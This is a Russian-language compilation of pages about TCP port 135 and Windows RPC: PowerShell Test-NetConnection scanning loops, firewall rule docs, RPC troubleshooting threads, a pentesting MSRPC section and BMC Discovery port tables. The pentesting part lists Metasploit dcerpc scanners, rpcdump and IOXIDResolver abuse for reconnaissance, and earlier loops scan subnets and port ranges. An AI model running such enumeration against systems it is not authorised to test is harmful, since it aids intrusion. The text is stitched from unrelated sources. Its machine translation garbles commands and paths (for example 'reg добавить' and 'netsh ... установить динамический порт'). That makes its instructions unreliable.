RemoteAddress          : 10.10.1.7
RemotePort             : 25
InterfaceAlias         : CORP
SourceAddress          : 10. 10.1.70
PingSucceeded          : True
PingReplyDetails (RTT) : 0 ms
TcpTestSucceeded       : True

Как вы видите, командлет выполняет разрешение имени сервера в IP адрес, выполняется проверка ответа ICMP (аналог ping) и доступность TCP порта. Указанный сервер доступен по ICMP (PingSucceeded = True) и 25 TCP порт также отвечает (RemotePort=25, TcpTestSucceeded= True).

Примечание.  В некоторых случаях может оказаться, что PingSucceeded=False, а TcpTestSucceeded= True. Скорее всего означает, что на удаленном сервере запрещен ICMP Ping.

У командлета есть специальный параметр –CommonTCPPort, позволяющий указать наименование известного сетевого протокола (HTTP, RDP, SMB, WINRM).

Например, чтобы проверить доступность веб-сервера, можно использовать команду:

Test-NetConnection -ComputerName winitpro.ru -CommonTCPPort HTTP

Или доступность RDP порта (3389):

Test-NetConnection msk-rds1 –CommonTCPPort RDP

Можно вывести все параметры, которые возвращает командлет Test-NetConnection:

Test-NetConnection msk-man01 -port 445|Format-List *

Если нужна только информация по доступности TCP порта, в более лаконичном виде проверка может быть выполнена так:

TNC msk-mail1 -Port 25 -InformationLevel Quiet

Командлет вернул True, значит удаленный порт доступен.

Совет. В предыдущих версиях PowerShell проверить доступность удаленного TCP порта можно так:

(New-Object System.Net.Sockets.TcpClient).Connect(‘msk-msg01’, 25)

В Windows 10/ Windows Server 2016 вы можете использовать командлет Test-NetConnection для трассировки маршрута до удаленного сервера при помощи параметра TraceRoute (аналог tracert). С помощью параметра Hops можно ограничить максимальное количество хопов при проверке.

Test-NetConnection msk-man01 –TraceRoute

Командлет вернул сетевую задержку при доступе к серверу в милисекундах (PingReplyDetails (RTT) : 41 ms) и все IP адреса маршрутизаторов на пути до целевого сервера.

Test-NetConnection в скриптах мониторинга

Следующая команда позволить проверить доступность определенного порта на множестве серверов, список которых хранится в текстовом файле servers. txt. Нас интересуют сервера, где искомая служба не отвечает:

Get-Content c:\Distr\servers.txt |  where { -NOT (Test-Netconnection $_ -Port 25  -InformationLevel Quiet)}| Format-Table –AutoSize

Аналогичным образом вы можете создать простейшую систему мониторинга, которая проверяет доступность серверов и выводит уведомление, если один из серверов недоступен.

Например, вы можете проверить доступность основных служб на всех контроллеров домена (список DC можно получить командлетом Get-ADDomainController). Проверим следующие службы на DC (в утилите PortQry есть аналогичное правило Domain and trusts):

  • RPC – TCP/135
  • LDAP – TCP/389
  • LDAP – TCP/3268
  • DNS – TCP/53
  • Kerberos – TCP/88
  • SMB – TCP/445

$Ports  = "135","389","636","3268","53","88","445","3269", "80", "443"
$AllDCs = Get-ADDomainController -Filter * | Select-Object Hostname,Ipv4address,isGlobalCatalog,Site,Forest,OperatingSystem
ForEach($DC in $AllDCs)
{
Foreach ($P in $Ports){
$check=Test-NetConnection $DC -Port $P -WarningAction SilentlyContinue
If ($check. tcpTestSucceeded -eq $true)
{Write-Host $DC.name $P -ForegroundColor Green -Separator " => "}
else
{Write-Host $DC.name $P -Separator " => " -ForegroundColor Red}
}

Скрипт проверит указанные TCP порты на контроллерах домена, и, если один из портов недоступен,  выделит его красным цветом (с небольшими доработками можно запустить данный PowerShell скрипт как службу Windows).

Сканер сети на PowerShell

Также вы можете реализовать простой сканер портов и IP подсетей  для сканирования удаленных серверов или подсетей на открытые/закрытые TCP порты.

Просканируем диапазон IP адресов на открытый порт 3389:

foreach ($ip in 5..30) {Test-NetConnection -Port 3389 -InformationLevel "Detailed" 10.10.10.$ip}

Просканируем диапазон TCP портов от 1 до 1024 на указанном сервере:

foreach ($port in 1..1024) {If (($a=Test-NetConnection srvfs01 -Port $port -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true){ "TCP port $port is open!"}}

Мастер правил брандмауэра: страница «Протоколы и порты»

На этой странице мастера задаются сведения о том, какие протоколы и порты, указываемые в сетевом пакете, удовлетворяют данному правилу брандмауэра.

Чтобы перейти к этой странице мастера
  1. В оснастке консоли MMC «Брандмауэр Windows в режиме повышенной безопасности» щелкните правой кнопкой мыши пункт Правила для входящих подключений или Правила для исходящих подключений и выберите команду Новое правило.

  2. На странице Тип правила выберите Порт или Настраиваемый.

  3. В мастере нажимайте кнопку Далее до тех пор, пока не дойдете до страницы Протокол и порты.

Выберите протокол, сетевой трафик которого необходимо фильтровать с помощью данного правила брандмауэра. Если в списке нет требуемого протокола, выберите Настраиваемый и введите номер протокола в поле Номер протокола.

Если указываются протоколы TCP или UDP, то в полях Порт конечной точки 1 и Порт конечной точки 2 можно задать номера портов TCP или UDP.

Список протоколов, их портов и краткое описание см. в разделе библиотеки TechNet Страница свойств правила брандмауэра: Вкладка «Протоколы и порты» (http://go.microsoft.com/fwlink/?linkid=137823).

При выборе типа протокола соответствующий идентификационный номер протокола отображается в поле Номер протокола и доступен только для чтения. При выборе Настраиваемый для Типа протокола необходимо ввести идентификационный номер протокола в поле Номер протокола.

Используя протоколы TCP или UDP, можно задать локальный порт, выбрав его в раскрывающемся списке или непосредственно задав порт или список портов. Локальный порт - это порт компьютера, к которому применяется профиль брандмауэра.

Для правил входящих подключений доступны следующие параметры:

  • Все порты. Доступен для правил входящих и исходящих подключений по протоколам TCP и UDP. Выбор этого параметра указывает, что все порты для выбранного протокола удовлетворяют правилу.
  • Определенные порты. Доступен для правил входящих и исходящих подключений по протоколам TCP и UDP. При выборе этого параметра разрешается ввод в текстовое поле требуемых номеров портов. Порты разделяются запятыми, диапазон портов указывается через дефис.
  • Сопоставитель конечных точек RPC. Доступен только для правил входящих подключений по протоколу TCP. При выборе этого параметра локальный компьютер будет получать входящие запросы RPC через порт TCP 135 для сопоставителя конечных точек RPC (RPC-EM). В запросе к RPC-EM указывается сетевая служба и запрашивается номер порта, по которому прослушивается указанная сетевая служба. RPC-EM сообщает номер порта, на который удаленный компьютер должен будет передавать сетевой трафик для данной службы. Этот параметр также позволяет RPC-EM принимать RPC-запросы по HTTP.
  • Динамические порты RPC. Доступен только для правил входящих подключений по протоколу TCP. При выборе этого параметра локальный компьютер будет получать входящие сетевые пакеты RPC через порты, назначенные средой выполнения RPC. Порты из временного диапазона RPC блокируются брандмауэром Windows, если они не были назначены исполняемым модулем RPC определенной сетевой службе RPC. Только программа, которой исполняемым модулем RPC назначен порт, может принимать входящий трафик через этот порт.
    Важно!
    • При создании правил, разрешающих сетевой трафик RPC при помощи параметров Сопоставитель конечных точек RPC и Динамические порты RPC, разрешается весь сетевой трафик RPC. Брандмауэр Windows не может фильтровать трафик RPC при помощи идентификатора UUID целевой программы.
    • Когда приложение использует RPC для взаимодействия от клиента к серверу, то обычно необходимо создать два правила - одно для сопоставителя конечных точек RPC, а другое для динамического RPC.
  • IPHTTPS. Доступен только для TCP. Доступен в разделе Локальный порт только для правил входящих подключений. При выборе этого параметра локальному компьютеру разрешается принимать входящие пакеты IPTHTTPS от удаленного компьютера. IPHTTPS является протоколом туннелирования, который поддерживает внедрение пакетов IPv6 в сетевые пакеты IPv4 HTTPS. Это позволяет трафику IPv6 проходить через IP-прокси, которые не поддерживают IPv6 или некоторые другие технологии туннелирования IPv6, например Teredo или 6to4.
  • Обход узлов. Доступен только для правил входящих подключений по протоколу UDP. При выборе этого параметра локальному компьютеру разрешается получать входящие сетевые пакеты Teredo.

Используя протоколы типа TCP или UDP, можно задать локальный и удаленный порт, выбрав его в раскрывающемся списке или непосредственно введя номер порта или список портов. Удаленный порт - это порт на компьютере, пытающимся установить связь с другим компьютером, на котором применен профиль брандмауэра.

Для правил входящих подключений доступны следующие параметры:

  • Все порты. Доступен для правил входящих и исходящих подключений по протоколам TCP и UDP. Выбор этого параметра указывает, что все порты для выбранного протокола удовлетворяют правилу.
  • Определенные порты. Доступен для правил входящих и исходящих подключений по протоколам TCP и UDP. При выборе этого параметра разрешается ввод в текстовое поле требуемых номеров портов. Порты разделяются запятыми, диапазон портов указывается через дефис.
  • IPHTTPS. Доступен только для TCP. Доступен в разделе Удаленный порт только для правил исходящих подключений. При выборе этого параметра локальному компьютеру разрешается посылать удаленному компьютеру исходящие пакеты IPTHTTPS. IPHTTPS является протоколом туннелирования, который поддерживает внедрение пакетов IPv6 в сетевые пакеты IPv4 HTTPS. Это позволяет трафику IPv6 проходить через IP-прокси, которые не поддерживают IPv6 или некоторые другие технологии туннелирования IPv6, например Teredo или 6to4.

Если необходимо создать правило, которое будет разрешать или блокировать ICMP-пакеты, в списке Тип протокола выберите ICMPv4 или ICMPv6 и нажмите кнопку Настроить. Настроить эти параметры можно в диалоговом окне Настройка параметров ICMP.

После создания правила брандмауэра можно изменить эти настройки в диалоговом окне Свойства правила брандмауэра. Чтобы открыть это диалоговое окно, дважды щелкните правило в списке Правила для входящих подключений или Правила для исходящих подключений. Изменить эти настройки можно на вкладке Протоколы и порты.

GRC | Администрация порта, для Интернет-порта 135

Порт 135, безусловно, не является портом, который должен быть или должен быть доступен для Интернета. Хакерские инструменты, такие как «epdump» (Endpoint Dump), могут немедленно идентифицировать каждый связанный с DCOM сервер / службу, работающую на хост-компьютере пользователя, и сопоставлять их с известными эксплойтами для этих служб.

Любые машины, размещенные за NAT-маршрутизатором (любой типичный домашний или малый бизнес-маршрутизатор с широкополосным IP-совместным использованием), будут изначально безопасными.И любой хороший персональный программный брандмауэр также должен иметь возможность легко блокировать порт 135 от внешнего воздействия. Это то, что ты хочешь.

Кроме того, многие поставщики услуг Интернета, заботящиеся о безопасности, теперь блокируют порт 135 вместе с пресловутым «трио NetBIOS» портов (, 137–139, ). Таким образом, даже без какой-либо вашей собственной проактивной безопасности вы можете обнаружить, что порт 135 был заблокирован и украден вашим интернет-провайдером от вашего имени.

Идем дальше: закрытие порта 135

Широкое распространение и незащищенность этого порта вызвали серьезную озабоченность среди компьютерных гуру.Это привело к нескольким подходам к выключению сервера Windows DCOM и окончательному закрытию порта 135. Хотя приложения могут быть «с поддержкой DCOM» или «с поддержкой DCOM», очень немногие из них, если таковые имеются, фактически зависят от наличия своих служб. Следовательно, обычно можно (и, как правило, желательно, если вам удобно делать такие вещи), выключить DCOM и закрыть порт 135 без каких-либо побочных эффектов. (Чем меньше вещей работает в системе Windows, тем меньше вещей потребляет оперативную память и замедляет работу всего остального.)

Если вам интересно взять под контроль и прекратить работу другой ненужной «службы» Windows, следующие ссылки предоставят вам необходимую информацию и инструкции:

ТОЛЬКО для бесстрашных экспертов

См. Первый вопрос на этой странице базы знаний Майкрософт в разделе «Общие проблемы безопасности COM: как включить или отключить DCOM?

Страница с разнообразной информацией о DCOM: http: // accs-net.com / smallfish / dcom.htm

Все содержимое этой страницы защищено авторским правом © 2008 Gibson Research Corporation.

netbios - Какова последовательность портов Windows RPC 135, 137, 139 (и выше)? Что изменится с портом 145?

Эта статья в TechNet великолепна, я рекомендую вам добавить ее в закладки. В нем довольно подробно перечислены порты, используемые различными службами Windows.

В версиях Windows до Vista / 2008 NetBIOS использовалась для службы «RPC Locator», которая управляла базой данных службы имен RPC.Но в Vista / 2008 и последующих версиях служба RPC Locator больше не нужна или полезна. Это рудиментарно. С этого момента я буду говорить только о MSRPC в Vista / 2008 +.

Порты 137, 138 и 139 предназначены для NetBIOS, а , а не , необходимы для работы MSRPC.

Все порты, используемые RPC, следующие:

  RPC EPM TCP 135
RPC через HTTPS TCP 593
SMB (для именованных каналов) TCP 445
Эфемерный диапазон, динамический *
  

Другие приложения, такие как шлюз удаленного рабочего стола, будут использовать RPC через прокси-сервер HTTP и использовать порт 443 и т. Д.

Хотя в статье, на которую я ссылался выше, перечислены порты NetBIOS, они являются устаревшими и не требуются для RPC, при условии, что вы можете получить разрешение имен с помощью других средств (DNS) и при условии, что сама удаленная служба не зависит от NetBIOS.

Порт 145 фиктивный. Он ни для чего не используется. Где бы вы ни слышали, что это «улучшает положение», это неправильно.

Basic MSRPC использует порты 135 и динамический диапазон с высокими номерами. Этот динамический диапазон с высокими номерами - это порты 1024-5000 в XP / 2003 и ниже и 49152-65535 в Vista / 2008 и выше.Вы также можете вызвать временные порты этого диапазона портов.

Вы можете определить собственный диапазон портов, если хотите, например:

  reg добавить HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v Ports / t REG_MULTI_SZ / f / d 8000-9000
reg add HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v PortsInternetAvailable / t REG_SZ / f / d Y
reg add HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v UseInternetPorts / t REG_SZ / f / d Y
  

и / или

  netsh int ipv4 set dynamicport tcp start = 8000 num = 1001
netsh int ipv4 установить динамический порт udp start = 8000 num = 1001
netsh int ipv6 установить динамический порт tcp start = 8000 num = 1001
netsh int ipv6 установить динамический порт udp start = 8000 num = 1001
  

TCP-порт 135 является сопоставителем конечных точек MSRPC.Вы можете привязаться к этому порту на удаленном компьютере анонимно и либо перечислить все службы (конечные точки), доступные на этом компьютере, либо запросить, на каком порту работает конкретная служба, если вы знаете, что ищете.

Позвольте мне показать вам пример запроса к RPC Enpoint Mapper:

  C: \> PortQry.exe -n 192.168.1.1 -e 135

Запрос целевой системы называется:

 192.168.1.1

Попытка преобразовать IP-адрес в имя ...

IP-адрес преобразован в host01.labs.myotherpcisacloud.com

запрос ...

TCP-порт 135 (служба epmap): ПРОСЛУШИВАНИЕ

Использование эфемерного порта источника
Запрос базы данных Endpoint Mapper ...
Ответ сервера:

UUID: d95afe70-a6d5-4259-822e-2c84da1ddb0d
ncacn_ip_tcp: 192.168.1.1 [49152]

UUID: 12345778-1234-abcd-ef00-0123456789ac
ncacn_np: 192.168.1.1 [\\ pipe \\ lsass]

UUID: 12345778-1234-abcd-ef00-0123456789ac
ncacn_ip_tcp: 192.168.1.1 [49159]

UUID: 6b5bdd1e-528c-422c-af8c-a4079be4fe48 API удаленного Fw
ncacn_ip_tcp: 192.168.1.1 [49158]

UUID: 367abb81-9844-35f1-ad32-98f038001003
ncacn_ip_tcp: 192.168.1.1 [49157]

UUID: 12345678-1234-abcd-ef00-0123456789ab
ncacn_ip_tcp: 192.168.1.1 [49155]

UUID: 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1
ncacn_ip_tcp: 192.168.1.1 [49155]

UUID: ae33069b-a2a8-46ee-a235-ddfd339be281
ncacn_ip_tcp: 192. 168.1.1 [49155]

UUID: 4a452661-8290-4b36-8fbe-7f4093a94978
ncacn_ip_tcp: 192.168.1.1 [49155]

UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
ncacn_ip_tcp: 192.168.1.1 [49155]

UUID: 7f1343fe-50a9-4927-a778-0c5859517bac Служба DfsDs
ncacn_np: 192.168.1.1 [\\ PIPE \\ wkssvc]

UUID: 3473dd4d-2e88-4006-9cba-22570909dd10 WinHttp Auto-Proxy Service
ncacn_np: 192.168.1.1 [\\ PIPE \\ W32TIME_ALT]

UUID: 1ff70682-0a51-30e8-076d-740be8cee98b
ncacn_np: 192.168.1.1 [\\ PIPE \\ atsvc]

...

Всего найдено конечных точек: 50

==== Конец ответа на запрос сопоставителя конечных точек RPC ====
  

Вы заметите, что если вы выполните этот запрос на локальном компьютере, вы найдете гораздо больше конечных точек, чем если бы вы выполняли запрос с удаленного компьютера. Это связано с тем, что многие конечные точки RPC не доступны удаленно и используются только для локального межпроцессного взаимодействия.

Дополнительная литература: http: // technet.microsoft.com/en-us/library/cc738291(v=WS. 10).aspx

А также: https://www.myotherpcisacloud.com/post/2014/02/16/verifying-rpc-network-connectivity-like-a-boss.aspx

Контроллер домена

- «Сервер RPC недоступен» - порт 135 показывает фильтрацию - НЕТ брандмауэра

Итак, у меня есть пара контроллеров домена 2003, у которых, похоже, есть проблемы с репликацией. После запуска netdiag, dcdiag я понял, что существует проблема RPC, поэтому я проверил соединение с помощью portqry.EXE. От DC2 до DC1 подключение к портам, связанным с доменом (ldap, RPC, DNS, Kerberos, ...), кажется нормальным. Противоположное, похоже, не работает:

  TCP-порт 135 (служба epmap): ФИЛЬТР
portqry.exe -n 10.6.8.35 -e 135 -p TCP завершает работу с кодом возврата 0x00000002.
TCP-порт 445 (служба microsoft-ds): ФИЛЬТР
portqry.exe -n 10.6.8.35 -e 445 -p TCP завершает работу с кодом возврата 0x00000002.
  

Wireshark также показывает, что DC1 принимает пакеты, но не отвечает обратно на DC2, поэтому DC2 выполняет повторную передачу. Остальные порты в порядке:

  TCP-порт 389 (служба ldap): ПРОСЛУШИВАНИЕ
UDP-порт 389 ПРОСЛУШАЕТ
TCP-порт 3268 (служба msft-gc): ПРОСЛУШИВАНИЕ
TCP-порт 53 (служба домена): ПРОСЛУШИВАНИЕ
UDP-порт 53 (служба домена): ПРОСЛУШИВАНИЕ
  
Брандмауэр

Windows отключен на обоих серверах, и они находятся в одной подсети, поэтому другой внешний брандмауэр не блокирует трафик. Все службы, включая RPC, запущены и работают.

Netstat на DC2:

  C: \ Documents and Settings \ Administrator> netstat -na | findstr 135
  TCP 0.0.0.0: 135 0.0.0.0:0 ПРОСЛУШИВАНИЕ
  TCP 10.6.8.35:135 10.6.8.35:1814 УСТАНОВЛЕНО
  TCP 10.6.8.35:1814 10.6.8.35:135 УСТАНОВЛЕНО


C: \ Documents and Settings \ Administrator> netstat -na | findstr 445
  TCP 0.0.0.0:445 0.0.0.0:0 ПРОСЛУШИВАНИЕ
  UDP 0.0.0.0:445 *: *
  

Выполнение того же теста с portqry.exe на локальном хосте также не работает должным образом:

  Запуск портала.exe -n 127. 0.0.1 -e 135 -p TCP ...
Запрос целевой системы называется:
 127.0.0.1
Попытка преобразовать IP-адрес в имя ...
IP-адрес преобразован в adc.xxx.gr
запрос ...
TCP-порт 135 (служба epmap): ПРОСЛУШИВАНИЕ
Использование эфемерного порта источника
Запрос базы данных Endpoint Mapper ...
Ответ сервера:
RPC Endpoint Mapper не ответил
TCP-порт 135 отфильтрован
portqry.exe -n 127.0.0.1 -e 135 -p TCP завершает работу с кодом возврата 0x00000000.
  

windows 7 - RPC-соединение с фильтром без межсетевых экранов

У меня есть рабочая станция ( PC1 ), которая не может взаимодействовать с контроллером домена через RPC (TCP / 135).

  C: \ PortQryV2> portqry.exe -n 192.168.1.1 -p tcp -o 135

Запрос целевой системы называется:

 192.168.1.1

Попытка преобразовать IP-адрес в имя ...

IP-адрес преобразован в dc.domain.local

запрос ...

TCP-порт 135 <служба epmap>: ФИЛЬТР
  

Выполнение той же команды на другой рабочей станции ( PC2 ) в той же подсети и VLAN показывает LISTENING вместе со всеми конечными точками RPC сервера.

  C: \> netsh int ipv4 показать динамический порт tcp

Протокол tcp Динамический диапазон портов
---------------------------------
Начальный порт: 49152
Количество портов: 16384
  

Динамический диапазон портов одинаков для PC1 и PC2 .

И PC1 , и PC2 работают под управлением Windows 7 Enterprise SP1.

Программное обеспечение McAfee Host Intrusion Prevention (HIPS) раньше устанавливалось на PC1 , но было удалено в процессе устранения неполадок. Он остается установленным на PC2 . И PC1 , и PC2 использовали одну и ту же политику HIPS.

Брандмауэр Windows в настоящее время отключен на PC1 .

  C: \> netsh advfirewall показать все профили

Настройки профиля домена:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить

Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall. бревно
MaxFileSize 4096


Настройки личного профиля:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить

Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall.бревно
MaxFileSize 4096


Настройки публичного профиля:
-------------------------------------------------- --------------------
Состояние ВЫКЛ.
Политика межсетевого экрана AllowInbound, AllowOutbound
LocalFirewallRules Нет (только в хранилище GPO)
LocalConSecRules Нет (только в хранилище GPO)
InboundUserNotification Включить
Отключение удаленного управления
UnicastResponseToMulticast Включить

Логирование:
Отключить LogAllowedConnections
Отключить LogDroppedConnections
Имя файла% systemroot% \ system32 \ LogFiles \ Firewall \ pfirewall. бревно
MaxFileSize 4096

ОК.
  

Я захватил RPC-соединение от portqry.exe с помощью Wireshark и обнаружил, что TCP SYN DPU было отправлено, но ACK не было получено. TCP SYN был отправлен еще дважды, отображаясь в Wireshark как [TCP Retransmission] . Позже я зафиксировал ту же связь RPC на контроллере домена с помощью Wireshark. Я видел входящий TCP SYN , но не видел ответа SYN ACK .Это как если бы контроллер домена произвольно игнорировал только этот компьютер только на этом порту. Обратите внимание, что запросы Kerberos (UDP / 88) отлично работают с PC1 .

Я также попытался пересобрать стек TCP / IP на PC1 , но безрезультатно.

Есть идеи, что может помешать этому общению?

135, 593 - Pentesting MSRPC

Вызов удаленной процедуры Microsoft, также известный как вызов функции или вызов подпрограммы, - это протокол, который использует модель клиент-сервер, чтобы позволить одной программе запрашивать обслуживание у программы на другом компьютере. без необходимости разбираться в деталях сети этого компьютера.MSRPC был первоначально получен из программного обеспечения с открытым исходным кодом, но был дополнительно разработан и защищен авторским правом Microsoft.

В зависимости от конфигурации хоста к сопоставителю конечных точек RPC можно получить доступ через TCP и UDP-порт 135, через SMB с нулевым сеансом или сеансом с аутентификацией (TCP 139 и 445), а также в качестве веб-службы, прослушивающей TCP-порт 593.

 

135 / tcp open msrpc Microsoft Windows RPC

Процесс MSRPC начинается на стороне клиента, при этом клиентское приложение вызывает локальную процедуру-заглушку вместо кода, реализующего эту процедуру.Код-заглушка клиента извлекает необходимые параметры из адресного пространства клиента и доставляет их в библиотеку времени выполнения клиента, которая затем переводит параметры в стандартный формат представления сетевых данных для передачи на сервер.

Затем клиентская заглушка вызывает функции в клиентской библиотеке времени выполнения RPC для отправки запроса и параметров на сервер. Если сервер расположен удаленно, библиотека времени выполнения указывает соответствующий транспортный протокол и механизм и передает RPC в сетевой стек для транспортировки на сервер.Отсюда: https://www.extrahop.com/resources/protocols/msrpc/

Изображение из книги « Оценка сетевой безопасности, 3-е издание »

Раздел извлечен из книги « Оценка сетевой безопасности 3-е издание "

Вы можете запросить службу локатора RPC и отдельные конечные точки RPC, чтобы каталогизировать интересные службы, работающие по TCP, UDP, HTTP и SMB (через именованные каналы). Каждое значение IFID, полученное в ходе этого процесса, обозначает службу RPC (например,g., 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc - интерфейс Messenger).

rpcdump и ifids Тодда Сабина Утилиты Windows запрашивают как локатор RPC, так и определенные конечные точки RPC, чтобы получить список значений IFID. Синтаксис rpcdump выглядит следующим образом:

 

D: \ rpctools> rpcdump [-p порт] 192.168.189.1

IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0

0002 Служба обмена сообщениями Аннотации

0002 -0000-0000-0000-000000000000

Привязка: ncadg_ip_udp: 192.168.189.1 [1028]

Вы можете получить доступ к службе локатора RPC, используя четыре последовательности протоколов:

  • ncacn_ip_tcp и ncadg_ip_udp (TCP и UDP-порт 135)

  • ncacn_np через именованный канал \ epmapper SMB)

  • ncacn_http (RPC через HTTP через TCP-порт 80, 593 и другие)

 

использовать вспомогательный / scanner / dcerpc / endpoint_mapper

использовать вспомогательный / сканер / dcerpc / скрытый вспомогательный

/ dcerpc / management

используйте вспомогательный / scanner / dcerpc / tcp_dcerpc_auditor

rpcdump. py -p 135

Обратите внимание, что из упомянутых опций все, кроме tcp_dcerpc_auditor могут быть выполнены только для против порт 135 .

Используя https://github. com/mubix/IOXIDResolver, из исследования Airbus, возможно злоупотребление методом ServerAlive2 внутри интерфейса IOXIDResolver .

Этот метод использовался для получения информации об интерфейсе в виде адреса IPv6 из HTB-блока APT . См. Здесь для записи APT 0xdf, он включает альтернативный метод с использованием rpcmap.py из Impacket с привязкой строки (см. Выше).

Ссылки:

rpcdump.exe из rpctools может взаимодействовать с этим портом.

TCP 135 - Информация о протоколе порта и предупреждение!

Ищете информацию о протоколе TCP 135 ? На этой странице будет предпринята попытка предоставить вам как можно больше информации о порте TCP-порта 135.

TCP-порт 135 может использовать определенный протокол для связи в зависимости от приложения. Протокол - это набор формализованных правил, объясняющих, как данные передаются по сети. Думайте об этом как о языке, на котором говорят между компьютерами, чтобы помочь им общаться более эффективно.

Протокол

HTTP, например, определяет формат связи между интернет-браузерами и веб-сайтами. Другой пример - протокол IMAP, который определяет связь между почтовыми серверами IMAP и клиентами, или, наконец, протокол SSL, который устанавливает формат, используемый для зашифрованной связи.

TCP-порт 135

Вот что мы знаем о протоколе TCP Port 135 . Если у вас есть информация о TCP-порту 135, которая не отражена на этой странице, просто оставьте комментарий, и мы обновим нашу информацию.

ПОРТ 135 - Информация

Примечание: TCP-порт 135 использует протокол управления передачей. TCP - один из основных протоколов в сетях TCP / IP. В то время как протокол IP имеет дело только с пакетами, TCP позволяет двум хостам устанавливать соединение и обмениваться потоками данных.TCP гарантирует доставку данных, а также гарантирует, что пакеты будут доставлены через порт 135 в том же порядке, в котором они были отправлены. Гарантированная связь через порт 135 - ключевое различие между TCP и UDP. UDP-порт 135 не может гарантировать связь таким же образом, как TCP.

Поскольку порт 135 протокола TCP был помечен как вирус (красный цвет), это не означает, что вирус использует порт 135, но то, что троянец или вирус использовали этот порт в прошлом для связи.

TCP 135 - Заявление об ограничении ответственности

Мы делаем все возможное, чтобы предоставить вам точную информацию о PORT 135 и прилагаем все усилия, чтобы поддерживать нашу базу данных в актуальном состоянии.Это бесплатный сервис, точность которого не гарантируется. Мы делаем все возможное, чтобы исправить любые ошибки, и приветствуем отзывы!

Сетевые порты, используемые для связи для обнаружения - Документация для BMC Helix Discovery


В этом разделе описывается связь между BMC Helix Discovery Outpost и целями обнаружения. Он содержит следующие разделы:

Обнаружение базового устройства

Для повышения эффективности BMC Helix Discovery Outpost использует эхо-запрос ICMP для обнаружения устройства.Если в вашей среде подавляется эхо-запрос ICMP, можно использовать другие методы проверки связи. Для этого на вкладке Administration прокрутите вниз до раздела Discovery и нажмите Discovery Configuration . В разделе «Сканирование» включите Использовать TCP ACK «ping» перед сканированием. и Использовать TCP SYN «ping» перед сканированием флажков и введите номера портов в TCP-портах, которые будут использоваться для начального сканирования, и UDP-порты для использования. для полей начального сканирования.


Если вы не разрешите пинги ICMP через брандмауэр и не включите TCP Ack и Synpings, вы можете потерять производительность.Это связано с тем, что система выполняет полное сканирование порта nmap "методом доступа", чтобы определить, присутствует ли хост на самом деле, что вызывает задержки, поскольку он ожидает запросов до тайм-аута. В этой ситуации вы должны изменить параметр «Пинговать хосты перед сканированием» на «Нет». Если существует ограниченный диапазон IP-адресов, для которых подавлено эхо-запрос ICMP, вы можете отключить поведение ping для этих IP-адресов с помощью параметра «Исключить диапазоны из ping». Дополнительные сведения см. В разделе Настройка параметров обнаружения.

Для сканирования сетей, которые не разрешают пинг-пакеты ICMP, вы можете установить Использовать пинг TCP ACK перед сканированием или Использовать пинг TCP SYN перед сканированием (или обоих) в настройках обнаружения на Да .Если BMC Helix Discovery пингует IP-адрес, на котором нет устройства, и какой-то брандмауэр в вашей среде настроен для ответа на этот IP-адрес, это может привести к отправке сообщения об устройстве, которого нет в сети, а не о темном пространстве (NoResponse). Чтобы избежать этого, рекомендуется либо изменить такие конфигурации брандмауэра, либо не включать пинг TCP ACK или пинг TCP SYN.

Если BMC Helix Discovery не может подключиться к конечной точке, он использует эвристические методы для оценки присутствующего устройства.Этим можно управлять с помощью параметров в разделе «Настройка параметров обнаружения».

Порт 4, использующий TCP и UDP, необходим при использовании IP Fingerprinting, поскольку обнаружение должно отслеживать ответ от гарантированно закрытого порта на конечной точке.

Порт 4 должен быть закрыт на цели обнаружения, но должен быть открыт на любом межсетевом экране между устройством и целью обнаружения, чтобы ответ был от цели, а не от межсетевого экрана. Если это не так, эвристика получает ответ от двух разных стеков TCP / IP, что приводит к непредсказуемым результатам, включая классификацию конечной точки как брандмауэра или нераспознанного устройства.Это может привести к пропуску устройств (см. UnsupportedDevice на странице DiscoveryAccess).

Порты, перечисленные в следующей таблице, используются для определения присутствующего устройства.

9386

OS0003

Номер порта

Назначение порта

4

Закрытый порт

21

21

SSH

23

telnet

80

HTTP

Windows 135

PC

443 HTTPS

513

rlogin

902 VMware Authentication Daemon
5988 WBEM HTTP
5989 WBEM HTTPS

Порты SNMP, используемые для обнаружения

Единственный порт, необходимый для обнаружения SNMP, - это 161 UDP.

Порты UNIX, используемые для обнаружения

Минимальный порт, необходимый для успешного обнаружения UNIX, - это просто порт, связанный с используемыми вами методами доступа. Например, если вы используете только ssh, это будет порт 22. В следующей таблице подробно описаны назначения для каждого номера порта.

Номер порта

Назначение порта

22

SSH

23

8

8

Порты Windows, используемые для обнаружения

В этом разделе описаны порты, которые BMC Discovery Outpost использует при обнаружении удаленных целей Windows.Если вы намереваетесь обнаруживать хосты за брандмауэром, вы должны открыть эти порты в брандмауэре. Указанные порты являются исходящими (от прокси-сервера Windows и устройства) TCP-портами. Цели Windows и порт 135 Устройство сканирует порт 135, чтобы определить, открыт ли порт. Если порт 135 открыт, целью, скорее всего, будет хост Windows, и дальнейшее обнаружение выполняется с помощью прокси-сервера Windows. Вы можете отключить сканирование порта 135. Если вы это сделаете, BMC Helix Discovery предполагает, что все цели являются хостами Windows.Узел UNIX сканируется безуспешно с помощью прокси-сервера Windows до того, как будут применены какие-либо методы доступа UNIX. Чтобы отключить сканирование порта 135:

  1. Выберите Администрирование> Обнаружение> Конфигурация обнаружения .
  2. Выберите Нет в Проверьте порт 135 перед использованием методов доступа Windows Поле .
WMI

